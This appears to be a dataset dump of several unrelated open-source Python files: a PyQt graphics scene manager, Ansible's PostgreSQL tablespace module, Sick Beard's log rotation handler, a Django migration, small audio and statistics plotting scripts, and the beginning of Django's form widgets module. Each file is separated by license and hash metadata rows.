from ems.qt.graphics.tool import GraphicsTool
from ems.qt.graphics.tool import GraphicsToolDispatcher
from ems.qt.graphics.text_tool import TextTool
from ems.qt.graphics.pixmap_tool import PixmapTool
from ems.qt.graphics.interfaces import Finalizer
from ems.qt.graphics.page_item import PageItemHider, PageItem
Qt = QtCore.Qt
QObject = QtCore.QObject
QRectF = QtCore.QRectF
pyqtProperty = QtCore.pyqtProperty
pyqtSlot = QtCore.pyqtSlot
QWidget = QtWidgets.QWidget
QVBoxLayout = QtWidgets.QVBoxLayout
QToolBar = QtWidgets.QToolBar
QSlider = QtWidgets.QSlider
QAction = QtWidgets.QAction
QKeySequence = QtGui.QKeySequence
QPrintPreviewDialog = QtPrintSupport.QPrintPreviewDialog
QPainter = QtGui.QPainter
class SceneManager(QObject):
def __init__(self, parent=None, storageManager=None):
super(SceneManager, self).__init__(parent)
self._scene = None
self._widget = None
self._tools = None
self._storageManager = None
self._importStorageManager = None
self._loadAction = None
self._saveAction = None
self._importAction = None
self._exportAction = None
self._actions = []
self._finalizers = [BackgroundCorrector(), PageItemHider()]
if storageManager:
self.setStorageManager(storageManager)
def actions(self):
if not self._actions:
self._populateActions()
return self._actions
def getScene(self):
if not self._scene:
self._scene = GraphicsScene()
self._scene.deleteRequested.connect(self.deleteIfWanted)
return self._scene
scene = pyqtProperty(GraphicsScene, getScene)
def getWidget(self):
if not self._widget:
self._widget = GraphicsWidget(scene=self.scene, tools=self.tools)
self._addActionsToWidget(self._widget)
self._widget.printPreviewRequested.connect(self.showPrintPreviewDialog)
return self._widget
widget = pyqtProperty(GraphicsWidget, getWidget)
def getTools(self):
if not self._tools:
self._tools = self._createTools()
return self._tools
tools = pyqtProperty(GraphicsTool, getTools)
def load(self, *args):
if self._storageManager:
return self._storageManager.load()
def save(self, *args):
if self._storageManager:
return self._storageManager.save()
def importScene(self, *args):
if self._importStorageManager:
return self._importStorageManager.load()
def exportScene(self, *args):
if self._importStorageManager:
return self._importStorageManager.save()
def getStorageManager(self):
return self._storageManager
@pyqtSlot(SceneStorageManager)
def setStorageManager(self, storageManager):
self._storageManager = storageManager
self._storageManager.setScene(self.scene)
self._storageManager.setTools(self.tools)
storageManager = pyqtProperty(SceneStorageManager, getStorageManager, setStorageManager)
def getImportStorageManager(self):
return self._importStorageManager
def setImportStorageManager(self, storageManager):
self._importStorageManager = storageManager
self._importStorageManager.setScene(self.scene)
self._importStorageManager.setTools(self.tools)
importStorageManager = pyqtProperty(SceneStorageManager, getImportStorageManager, setImportStorageManager)
@property
def loadAction(self):
if self._loadAction:
return self._loadAction
self._loadAction = QAction('Load', self.getWidget(), shortcut = QKeySequence.Open)
self._loadAction.triggered.connect(self.load)
return self._loadAction
@property
def saveAction(self):
if self._saveAction:
return self._saveAction
self._saveAction = QAction('Save', self.getWidget(), shortcut = QKeySequence.Save)
self._saveAction.triggered.connect(self.save)
return self._saveAction
@property
def importAction(self):
if self._importAction:
return self._importAction
self._importAction = QAction('Import', self.getWidget())
self._importAction.triggered.connect(self.importScene)
return self._importAction
@property
def exportAction(self):
if self._exportAction:
return self._exportAction
self._exportAction = QAction('Export', self.getWidget())
self._exportAction.triggered.connect(self.exportScene)
return self._exportAction
def printScene(self, printer, painter=None):
painter = painter if isinstance(painter, QPainter) else QPainter(printer)
for finalizer in self._finalizers:
finalizer.toFinalized(self.scene)
pageItem = self._findPageItem()
if pageItem:
self.scene.render(painter, QRectF(), pageItem.boundingRect())
else:
self.scene.render(painter)
for finalizer in self._finalizers:
finalizer.toEditable(self.scene)
def showPrintPreviewDialog(self):
margin = 30
parent = self.getWidget()
self.printPrvDlg = QPrintPreviewDialog(parent)
self.printPrvDlg.setWindowTitle(u'Druckvorschau')
self.printPrvDlg.paintRequested.connect(self.printScene)
self.printPrvDlg.resize(parent.width()-margin, parent.height()-margin)
self.printPrvDlg.show()
def deleteIfWanted(self):
items = self.scene.selectedItems()
if not len(items):
return
for item in items:
self.scene.removeItem(item)
@accepts(Finalizer)
def addFinalizer(self, finalizer):
self._finalizers.append(finalizer)
def hasFinalizer(self, finalizer):
return finalizer in self._finalizers
def finalizer(self, cls):
for finalizer in self._finalizers:
if isinstance(finalizer, cls):
return finalizer
def _createTools(self):
tools = GraphicsToolDispatcher(self)
tools.setScene(self.scene)
textTool = TextTool()
tools.addTool(textTool)
pixmapTool = PixmapTool()
tools.addTool(pixmapTool)
return tools
def _populateActions(self):
if self._actions:
return
self._actions.append(self.loadAction)
self._actions.append(self.saveAction)
self._actions.append(self.importAction)
self._actions.append(self.exportAction)
def _addActionsToWidget(self, widget):
for action in self.actions():
widget.addAction(action)
def _findPageItem(self):
for item in self.scene.items():
if isinstance(item, PageItem):
return item | mit | 2,377,236,452,932,278,300 | 32.683962 | 110 | 0.67605 | false |
pgmillon/ansible | lib/ansible/modules/database/postgresql/postgresql_tablespace.py | 1 | 16280 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Flavien Chantelot (@Dorn-)
# Copyright: (c) 2018, Antoine Levy-Lambert (@antoinell)
# Copyright: (c) 2019, Andrew Klychkov (@Andersson007) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'supported_by': 'community',
'status': ['preview']
}
DOCUMENTATION = r'''
---
module: postgresql_tablespace
short_description: Add or remove PostgreSQL tablespaces from remote hosts
description:
- Adds or removes PostgreSQL tablespaces from remote hosts
U(https://www.postgresql.org/docs/current/sql-createtablespace.html),
U(https://www.postgresql.org/docs/current/manage-ag-tablespaces.html).
version_added: '2.8'
options:
tablespace:
description:
- Name of the tablespace to add or remove.
required: true
type: str
aliases:
- name
location:
description:
- Path to the tablespace directory in the file system.
- Ensure that the location exists and has right privileges.
type: path
aliases:
- path
state:
description:
- Tablespace state.
- I(state=present) implies the tablespace must be created if it doesn't exist.
- I(state=absent) implies the tablespace must be removed if present.
I(state=absent) is mutually exclusive with I(location), I(owner), i(set).
- See the Notes section for information about check mode restrictions.
type: str
default: present
choices: [ absent, present ]
owner:
description:
- Name of the role to set as an owner of the tablespace.
- If this option is not specified, the tablespace owner is a role that creates the tablespace.
type: str
set:
description:
- Dict of tablespace options to set. Supported from PostgreSQL 9.0.
- For more information see U(https://www.postgresql.org/docs/current/sql-createtablespace.html).
- When reset is passed as an option's value, if the option was set previously, it will be removed
U(https://www.postgresql.org/docs/current/sql-altertablespace.html).
type: dict
rename_to:
description:
- New name of the tablespace.
- The new name cannot begin with pg_, as such names are reserved for system tablespaces.
session_role:
description:
- Switch to session_role after connecting. The specified session_role must
be a role that the current login_user is a member of.
- Permissions checking for SQL commands is carried out as though
the session_role were the one that had logged in originally.
type: str
db:
description:
- Name of database to connect to and run queries against.
type: str
aliases:
- login_db
notes:
- I(state=absent) and I(state=present) (the second one if the tablespace doesn't exist) do not
support check mode because the corresponding PostgreSQL DROP and CREATE TABLESPACE commands
can not be run inside the transaction block.
author:
- Flavien Chantelot (@Dorn-)
- Antoine Levy-Lambert (@antoinell)
- Andrew Klychkov (@Andersson007)
extends_documentation_fragment: postgres
'''
EXAMPLES = r'''
- name: Create a new tablespace called acme and set bob as an its owner
postgresql_tablespace:
name: acme
owner: bob
location: /data/foo
- name: Create a new tablespace called bar with tablespace options
postgresql_tablespace:
name: bar
set:
random_page_cost: 1
seq_page_cost: 1
- name: Reset random_page_cost option
postgresql_tablespace:
name: bar
set:
random_page_cost: reset
- name: Rename the tablespace from bar to pcie_ssd
postgresql_tablespace:
name: bar
rename_to: pcie_ssd
- name: Drop tablespace called bloat
postgresql_tablespace:
name: bloat
state: absent
'''
RETURN = r'''
queries:
description: List of queries that was tried to be executed.
returned: always
type: str
sample: [ "CREATE TABLESPACE bar LOCATION '/incredible/ssd'" ]
tablespace:
description: Tablespace name.
returned: always
type: str
sample: 'ssd'
owner:
description: Tablespace owner.
returned: always
type: str
sample: 'Bob'
options:
description: Tablespace options.
returned: always
type: dict
sample: { 'random_page_cost': 1, 'seq_page_cost': 1 }
location:
description: Path to the tablespace in the file system.
returned: always
type: str
sample: '/incredible/fast/ssd'
newname:
description: New tablespace name
returned: if existent
type: str
sample: new_ssd
state:
description: Tablespace state at the end of execution.
returned: always
type: str
sample: 'present'
'''
try:
from psycopg2 import __version__ as PSYCOPG2_VERSION
from psycopg2.extras import DictCursor
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT as AUTOCOMMIT
from psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED as READ_COMMITTED
except ImportError:
# psycopg2 is checked by connect_to_db()
# from ansible.module_utils.postgres
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import pg_quote_identifier
from ansible.module_utils.postgres import (
connect_to_db,
exec_sql,
get_conn_params,
postgres_common_argument_spec,
)
class PgTablespace(object):
"""Class for working with PostgreSQL tablespaces.
Args:
module (AnsibleModule) -- object of AnsibleModule class
cursor (cursor) -- cursor object of psycopg2 library
name (str) -- name of the tablespace
Attrs:
module (AnsibleModule) -- object of AnsibleModule class
cursor (cursor) -- cursor object of psycopg2 library
name (str) -- name of the tablespace
exists (bool) -- flag the tablespace exists in the DB or not
owner (str) -- tablespace owner
location (str) -- path to the tablespace directory in the file system
executed_queries (list) -- list of executed queries
new_name (str) -- new name for the tablespace
opt_not_supported (bool) -- flag indicates a tablespace option is supported or not
"""
def __init__(self, module, cursor, name):
self.module = module
self.cursor = cursor
self.name = name
self.exists = False
self.owner = ''
self.settings = {}
self.location = ''
self.executed_queries = []
self.new_name = ''
self.opt_not_supported = False
# Collect info:
self.get_info()
def get_info(self):
"""Get tablespace information."""
# Check that spcoptions exists:
opt = exec_sql(self, "SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spcoptions'", add_to_executed=False)
# For 9.1 version and earlier:
location = exec_sql(self, "SELECT 1 FROM information_schema.columns "
"WHERE table_name = 'pg_tablespace' "
"AND column_name = 'spclocation'", add_to_executed=False)
if location:
location = 'spclocation'
else:
location = 'pg_tablespace_location(t.oid)'
if not opt:
self.opt_not_supported = True
query = ("SELECT r.rolname, (SELECT Null), %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
else:
query = ("SELECT r.rolname, t.spcoptions, %s "
"FROM pg_catalog.pg_tablespace AS t "
"JOIN pg_catalog.pg_roles AS r "
"ON t.spcowner = r.oid "
"WHERE t.spcname = '%s'" % (location, self.name))
res = exec_sql(self, query, add_to_executed=False)
if not res:
self.exists = False
return False
if res[0][0]:
self.exists = True
self.owner = res[0][0]
if res[0][1]:
# Options exist:
for i in res[0][1]:
i = i.split('=')
self.settings[i[0]] = i[1]
if res[0][2]:
# Location exists:
self.location = res[0][2]
def create(self, location):
"""Create tablespace.
Return True if success, otherwise, return False.
args:
location (str) -- tablespace directory path in the FS
"""
query = ("CREATE TABLESPACE %s LOCATION '%s'" % (pg_quote_identifier(self.name, 'database'), location))
return exec_sql(self, query, ddl=True)
def drop(self):
"""Drop tablespace.
Return True if success, otherwise, return False.
"""
return exec_sql(self, "DROP TABLESPACE %s" % pg_quote_identifier(self.name, 'database'), ddl=True)
def set_owner(self, new_owner):
"""Set tablespace owner.
Return True if success, otherwise, return False.
args:
new_owner (str) -- name of a new owner for the tablespace"
"""
if new_owner == self.owner:
return False
query = "ALTER TABLESPACE %s OWNER TO %s" % (pg_quote_identifier(self.name, 'database'), new_owner)
return exec_sql(self, query, ddl=True)
def rename(self, newname):
"""Rename tablespace.
Return True if success, otherwise, return False.
args:
newname (str) -- new name for the tablespace"
"""
query = "ALTER TABLESPACE %s RENAME TO %s" % (pg_quote_identifier(self.name, 'database'), newname)
self.new_name = newname
return exec_sql(self, query, ddl=True)
def set_settings(self, new_settings):
"""Set tablespace settings (options).
If some setting has been changed, set changed = True.
After all settings list is handling, return changed.
args:
new_settings (list) -- list of new settings
"""
# settings must be a dict {'key': 'value'}
if self.opt_not_supported:
return False
changed = False
# Apply new settings:
for i in new_settings:
if new_settings[i] == 'reset':
if i in self.settings:
changed = self.__reset_setting(i)
self.settings[i] = None
elif (i not in self.settings) or (str(new_settings[i]) != self.settings[i]):
changed = self.__set_setting("%s = '%s'" % (i, new_settings[i]))
return changed
def __reset_setting(self, setting):
"""Reset tablespace setting.
Return True if success, otherwise, return False.
args:
setting (str) -- string in format "setting_name = 'setting_value'"
"""
query = "ALTER TABLESPACE %s RESET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return exec_sql(self, query, ddl=True)
def __set_setting(self, setting):
"""Set tablespace setting.
Return True if success, otherwise, return False.
args:
setting (str) -- string in format "setting_name = 'setting_value'"
"""
query = "ALTER TABLESPACE %s SET (%s)" % (pg_quote_identifier(self.name, 'database'), setting)
return exec_sql(self, query, ddl=True)
# ===========================================
# Module execution.
#
def main():
argument_spec = postgres_common_argument_spec()
argument_spec.update(
tablespace=dict(type='str', aliases=['name']),
state=dict(type='str', default="present", choices=["absent", "present"]),
location=dict(type='path', aliases=['path']),
owner=dict(type='str'),
set=dict(type='dict'),
rename_to=dict(type='str'),
db=dict(type='str', aliases=['login_db']),
session_role=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=(('positional_args', 'named_args'),),
supports_check_mode=True,
)
tablespace = module.params["tablespace"]
state = module.params["state"]
location = module.params["location"]
owner = module.params["owner"]
rename_to = module.params["rename_to"]
settings = module.params["set"]
if state == 'absent' and (location or owner or rename_to or settings):
module.fail_json(msg="state=absent is mutually exclusive location, "
"owner, rename_to, and set")
conn_params = get_conn_params(module, module.params)
db_connection = connect_to_db(module, conn_params, autocommit=True)
cursor = db_connection.cursor(cursor_factory=DictCursor)
# Change autocommit to False if check_mode:
if module.check_mode:
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=False)
else:
db_connection.set_isolation_level(READ_COMMITTED)
# Set defaults:
autocommit = False
changed = False
##############
# Create PgTablespace object and do main job:
tblspace = PgTablespace(module, cursor, tablespace)
# If tablespace exists with different location, exit:
if tblspace.exists and location and location != tblspace.location:
module.fail_json(msg="Tablespace '%s' exists with different location '%s'" % (tblspace.name, tblspace.location))
# Create new tablespace:
if not tblspace.exists and state == 'present':
if rename_to:
module.fail_json(msg="Tablespace %s does not exist, nothing to rename" % tablespace)
if not location:
module.fail_json(msg="'location' parameter must be passed with "
"state=present if the tablespace doesn't exist")
# Because CREATE TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.create(location)
# Drop non-existing tablespace:
elif not tblspace.exists and state == 'absent':
# Nothing to do:
module.fail_json(msg="Tries to drop nonexistent tablespace '%s'" % tblspace.name)
# Drop existing tablespace:
elif tblspace.exists and state == 'absent':
# Because DROP TABLESPACE can not be run inside the transaction block:
autocommit = True
if PSYCOPG2_VERSION >= '2.4.2':
db_connection.set_session(autocommit=True)
else:
db_connection.set_isolation_level(AUTOCOMMIT)
changed = tblspace.drop()
# Rename tablespace:
elif tblspace.exists and rename_to:
if tblspace.name != rename_to:
changed = tblspace.rename(rename_to)
if state == 'present':
# Refresh information:
tblspace.get_info()
# Change owner and settings:
if state == 'present' and tblspace.exists:
if owner:
changed = tblspace.set_owner(owner)
if settings:
changed = tblspace.set_settings(settings)
tblspace.get_info()
# Rollback if it's possible and check_mode:
if not autocommit:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
cursor.close()
db_connection.close()
# Make return values:
kw = dict(
changed=changed,
state='present',
tablespace=tblspace.name,
owner=tblspace.owner,
queries=tblspace.executed_queries,
options=tblspace.settings,
location=tblspace.location,
)
if state == 'present':
kw['state'] = 'present'
if tblspace.new_name:
kw['newname'] = tblspace.new_name
elif state == 'absent':
kw['state'] = 'absent'
module.exit_json(**kw)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,845,519,248,354,585,000 | 31.047244 | 120 | 0.615602 | false |
inspirehep/invenio-formatter | invenio_formatter/models.py | 1 | 1670 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2013, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Database cache for formatter."""
from invenio_ext.sqlalchemy import db
class Bibfmt(db.Model):
"""Represent a Bibfmt record."""
__tablename__ = 'bibfmt'
id_bibrec = db.Column(
db.MediumInteger(8, unsigned=True),
nullable=False,
server_default='0',
primary_key=True,
autoincrement=False)
format = db.Column(
db.String(10),
nullable=False,
server_default='',
primary_key=True,
index=True)
kind = db.Column(
db.String(10),
nullable=False,
server_default='',
index=True
)
last_updated = db.Column(
db.DateTime,
nullable=False,
server_default='1900-01-01 00:00:00',
index=True)
value = db.Column(db.iLargeBinary)
needs_2nd_pass = db.Column(db.TinyInteger(1), server_default='0')
__all__ = ('Bibfmt', )
| gpl-2.0 | -1,471,349,621,209,438,200 | 26.377049 | 74 | 0.651497 | false |
Wolkabout/WolkConnect-Python- | wolk/models/__init__.py | 1 | 1275 | from .ActuatorCommand import ActuatorCommand
from .ActuatorCommandType import ActuatorCommandType
from .ActuatorState import ActuatorState
from .ActuatorStatus import ActuatorStatus
from .Alarm import Alarm
from .ConfigurationCommand import ConfigurationCommand
from .ConfigurationCommandType import ConfigurationCommandType
from .Device import Device
from .FileTransferPacket import FileTransferPacket
from .FirmwareCommand import FirmwareCommand
from .FirmwareCommandType import FirmwareCommandType
from .FirmwareErrorType import FirmwareErrorType
from .FirmwareStatus import FirmwareStatus
from .FirmwareStatusType import FirmwareStatusType
from .FirmwareUpdateStateType import FirmwareUpdateStateType
from .InboundMessage import InboundMessage
from .OutboundMessage import OutboundMessage
from .SensorReading import SensorReading
__all__ = [
"ActuatorCommand",
"ActuatorCommandType",
"ActuatorState",
"ActuatorStatus",
"Alarm",
"ConfigurationCommand",
"ConfigurationCommandType",
"Device",
"FileTransferPacket",
"FirmwareCommand",
"FirmwareCommandType",
"FirmwareErrorType",
"FirmwareStatus",
"FirmwareStatusType",
"FirmwareUpdateStateType",
"InboundMessage",
"OutboundMessage",
"SensorReading",
]
| apache-2.0 | -2,715,640,380,868,830,000 | 31.692308 | 62 | 0.807059 | false |
Polytechnique-org/xorgauth | xorgauth/accounts/migrations/0012_make_user_names_blank.py | 1 | 1028 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-04 13:41
from __future__ import unicode_literals
from django.db import migrations, models
import xorgauth.utils.fields
class Migration(migrations.Migration):
dependencies = [
('accounts', '0011_make_user_ids_blank'),
]
operations = [
migrations.AlterField(
model_name='user',
name='firstname',
field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='first name'),
),
migrations.AlterField(
model_name='user',
name='lastname',
field=xorgauth.utils.fields.UnboundedCharField(blank=True, null=True, verbose_name='last name'),
),
migrations.AlterField(
model_name='user',
name='sex',
field=models.CharField(blank=True, choices=[('male', 'Male'), ('female', 'Female')], max_length=6,
null=True, verbose_name='sex'),
),
]
| agpl-3.0 | 2,887,847,014,832,465,000 | 31.125 | 110 | 0.577821 | false |
Souloist/Audio-Effects | Effects/Amplitude_Modulation/AM_example.py | 1 | 1911 | # Play a wave file with amplitude modulation.
# Assumes wave file is mono.
# This implementation reads and plays a one frame (sample) at a time (no blocking)
"""
Read a signal from a wave file, do amplitude modulation, play to output
Original: pyrecplay_modulation.py by Gerald Schuller, Octtober 2013
Modified to read a wave file - Ivan Selesnick, September 2015
"""
# f0 = 0 # Normal audio
f0 = 400 # 'Duck' audio
import pyaudio
import struct
import wave
import math
# Open wave file (mono)
input_wavefile = 'author.wav'
# input_wavefile = 'sin01_mono.wav'
# input_wavefile = 'sin01_stereo.wav'
wf = wave.open( input_wavefile, 'rb')
RATE = wf.getframerate()
WIDTH = wf.getsampwidth()
LEN = wf.getnframes()
CHANNELS = wf.getnchannels()
print 'The sampling rate is {0:d} samples per second'.format(RATE)
print 'Each sample is {0:d} bytes'.format(WIDTH)
print 'The signal is {0:d} samples long'.format(LEN)
print 'The signal has {0:d} channel(s)'.format(CHANNELS)
# Open audio stream
p = pyaudio.PyAudio()
stream = p.open(format = p.get_format_from_width(WIDTH),
channels = 1,
rate = RATE,
input = False,
output = True)
print('* Playing...')
# Loop through wave file
for n in range(0, LEN):
# Get sample from wave file
input_string = wf.readframes(1)
# Convert binary string to tuple of numbers
input_tuple = struct.unpack('h', input_string)
# (h: two bytes per sample (WIDTH = 2))
# Use first value (of two if stereo)
input_value = input_tuple[0]
# Amplitude modulation (f0 Hz cosine)
output_value = input_value * math.cos(2*math.pi*f0*n/RATE)
# Convert value to binary string
output_string = struct.pack('h', output_value)
# Write binary string to audio output stream
stream.write(output_string)
print('* Done')
stream.stop_stream()
stream.close()
p.terminate()
| mit | -6,821,632,004,709,263,000 | 26.695652 | 82 | 0.6719 | false |
mattpitkin/GraWIToNStatisticsLectures | figures/scripts/pvalue.py | 1 | 1242 | #!/usr/bin/env python
"""
Make plots showing how to calculate the p-value
"""
import matplotlib.pyplot as pl
from scipy.stats import norm
from scipy.special import erf
import numpy as np
mu = 0. # the mean, mu
sigma = 1. # standard deviation
x = np.linspace(-4, 4, 1000) # x
# set plot to render labels using latex
pl.rc('text', usetex=True)
pl.rc('font', family='serif')
pl.rc('font', size=14)
fig = pl.figure(figsize=(7,4), dpi=100)
# value of x for calculating p-value
Z = 1.233
y = norm.pdf(x, mu, sigma)
# plot pdfs
pl.plot(x, y, 'r')
pl.plot([-Z, -Z], [0., np.max(y)], 'k--')
pl.plot([Z, Z], [0., np.max(y)], 'k--')
pl.fill_between(x, np.zeros(len(x)), y, where=x<=-Z, facecolor='green', interpolate=True, alpha=0.6)
pl.fill_between(x, np.zeros(len(x)), y, where=x>=Z, facecolor='green', interpolate=True, alpha=0.6)
pvalue = 1.-erf(Z/np.sqrt(2.))
ax = pl.gca()
ax.set_xlabel('$Z$', fontsize=14)
ax.set_ylabel('$p(Z)$', fontsize=14)
ax.set_xlim(-4, 4)
ax.grid(True)
ax.text(Z+0.1, 0.3, '$Z_{\\textrm{obs}} = 1.233$', fontsize=16)
ax.text(-3.6, 0.31, '$p$-value$= %.2f$' % pvalue, fontsize=18,
bbox={'facecolor': 'none', 'pad':12, 'ec': 'r'})
fig.subplots_adjust(bottom=0.15)
pl.savefig('../pvalue.pdf')
pl.show()
| mit | 2,189,113,514,410,378,800 | 22.884615 | 100 | 0.625604 | false |
mozvip/Sick-Beard | sickbeard/logger.py | 1 | 6374 | # Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os
import threading
import logging
import sickbeard
from sickbeard import classes
# number of log files to keep
NUM_LOGS = 3
# log size in bytes
LOG_SIZE = 10000000 # 10 megs
ERROR = logging.ERROR
WARNING = logging.WARNING
MESSAGE = logging.INFO
DEBUG = logging.DEBUG
reverseNames = {u'ERROR': ERROR,
u'WARNING': WARNING,
u'INFO': MESSAGE,
u'DEBUG': DEBUG}
class SBRotatingLogHandler(object):
def __init__(self, log_file, num_files, num_bytes):
self.num_files = num_files
self.num_bytes = num_bytes
self.log_file = log_file
self.cur_handler = None
self.writes_since_check = 0
self.log_lock = threading.Lock()
def initLogging(self, consoleLogging=True):
self.log_file = os.path.join(sickbeard.LOG_DIR, self.log_file)
self.cur_handler = self._config_handler()
logging.getLogger('sickbeard').addHandler(self.cur_handler)
logging.getLogger('subliminal').addHandler(self.cur_handler)
# define a Handler which writes INFO messages or higher to the sys.stderr
if consoleLogging:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
console.setFormatter(logging.Formatter('%(asctime)s %(levelname)s::%(message)s', '%H:%M:%S'))
# add the handler to the root logger
logging.getLogger('sickbeard').addHandler(console)
logging.getLogger('subliminal').addHandler(console)
logging.getLogger('sickbeard').setLevel(logging.DEBUG)
logging.getLogger('subliminal').setLevel(logging.ERROR)
def _config_handler(self):
"""
Configure a file handler to log at file_name and return it.
"""
file_handler = logging.FileHandler(self.log_file)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', '%b-%d %H:%M:%S'))
return file_handler
def _log_file_name(self, i):
"""
Returns a numbered log file name depending on i. If i==0 it just uses logName, if not it appends
it to the extension (blah.log.3 for i == 3)
i: Log number to ues
"""
return self.log_file + ('.' + str(i) if i else '')
def _num_logs(self):
"""
Scans the log folder and figures out how many log files there are already on disk
Returns: The number of the last used file (eg. mylog.log.3 would return 3). If there are no logs it returns -1
"""
cur_log = 0
while os.path.isfile(self._log_file_name(cur_log)):
cur_log += 1
return cur_log - 1
def _rotate_logs(self):
sb_logger = logging.getLogger('sickbeard')
subli_logger = logging.getLogger('subliminal')
# delete the old handler
if self.cur_handler:
self.cur_handler.flush()
self.cur_handler.close()
sb_logger.removeHandler(self.cur_handler)
subli_logger.removeHandler(self.cur_handler)
# rename or delete all the old log files
for i in range(self._num_logs(), -1, -1):
cur_file_name = self._log_file_name(i)
try:
if i >= NUM_LOGS:
os.remove(cur_file_name)
else:
os.rename(cur_file_name, self._log_file_name(i+1))
except WindowsError:
pass
# the new log handler will always be on the un-numbered .log file
new_file_handler = self._config_handler()
self.cur_handler = new_file_handler
sb_logger.addHandler(new_file_handler)
subli_logger.addHandler(new_file_handler)
def log(self, toLog, logLevel=MESSAGE):
with self.log_lock:
# check the size and see if we need to rotate
if self.writes_since_check >= 10:
if os.path.isfile(self.log_file) and os.path.getsize(self.log_file) >= LOG_SIZE:
self._rotate_logs()
self.writes_since_check = 0
else:
self.writes_since_check += 1
meThread = threading.currentThread().getName()
message = meThread + u" :: " + toLog
out_line = message.encode('utf-8')
sb_logger = logging.getLogger('sickbeard')
try:
if logLevel == DEBUG:
sb_logger.debug(out_line)
elif logLevel == MESSAGE:
sb_logger.info(out_line)
elif logLevel == WARNING:
sb_logger.warning(out_line)
elif logLevel == ERROR:
sb_logger.error(out_line)
# add errors to the UI logger
classes.ErrorViewer.add(classes.UIError(message))
else:
sb_logger.log(logLevel, out_line)
except ValueError:
pass
sb_log_instance = SBRotatingLogHandler('sickbeard.log', NUM_LOGS, LOG_SIZE)
def log(toLog, logLevel=MESSAGE):
sb_log_instance.log(toLog, logLevel) | gpl-3.0 | -7,407,349,847,844,336,000 | 32.464865 | 118 | 0.568089 | false |
c2corg/v6_api | c2corg_api/search/mappings/image_mapping.py | 1 | 1144 | from c2corg_api.models.image import IMAGE_TYPE, Image
from c2corg_api.search.mapping import SearchDocument, BaseMeta
from c2corg_api.search.mapping_types import QueryableMixin, QEnumArray, \
QInteger, QDate
class SearchImage(SearchDocument):
class Meta(BaseMeta):
doc_type = IMAGE_TYPE
activities = QEnumArray(
'act', model_field=Image.activities)
categories = QEnumArray(
'cat', model_field=Image.categories)
image_type = QEnumArray(
'ityp', model_field=Image.image_type)
elevation = QInteger(
'ialt', range=True)
date_time = QDate('idate', 'date_time')
FIELDS = [
'activities', 'categories', 'image_type', 'elevation', 'date_time'
]
@staticmethod
def to_search_document(document, index):
search_document = SearchDocument.to_search_document(document, index)
if document.redirects_to:
return search_document
SearchDocument.copy_fields(
search_document, document, SearchImage.FIELDS)
return search_document
SearchImage.queryable_fields = QueryableMixin.get_queryable_fields(SearchImage)
| agpl-3.0 | 6,425,518,314,371,161,000 | 29.105263 | 79 | 0.681818 | false |
ar4s/django | django/forms/widgets.py | 1 | 32506 | """
HTML Widget classes
"""
from __future__ import unicode_literals
import copy
from itertools import chain
import warnings
from django.conf import settings
from django.forms.utils import flatatt, to_current_timezone
from django.utils.datastructures import MultiValueDict, MergeDict
from django.utils.html import conditional_escape, format_html
from django.utils.translation import ugettext_lazy
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.safestring import mark_safe
from django.utils import datetime_safe, formats, six
from django.utils.six.moves.urllib.parse import urljoin
__all__ = (
'Media', 'MediaDefiningClass', 'Widget', 'TextInput',
'EmailInput', 'URLInput', 'NumberInput', 'PasswordInput',
'HiddenInput', 'MultipleHiddenInput', 'ClearableFileInput',
'FileInput', 'DateInput', 'DateTimeInput', 'TimeInput', 'Textarea', 'CheckboxInput',
'Select', 'NullBooleanSelect', 'SelectMultiple', 'RadioSelect',
'CheckboxSelectMultiple', 'MultiWidget',
'SplitDateTimeWidget', 'SplitHiddenDateTimeWidget',
)
MEDIA_TYPES = ('css','js')
@python_2_unicode_compatible
class Media(object):
def __init__(self, media=None, **kwargs):
if media:
media_attrs = media.__dict__
else:
media_attrs = kwargs
self._css = {}
self._js = []
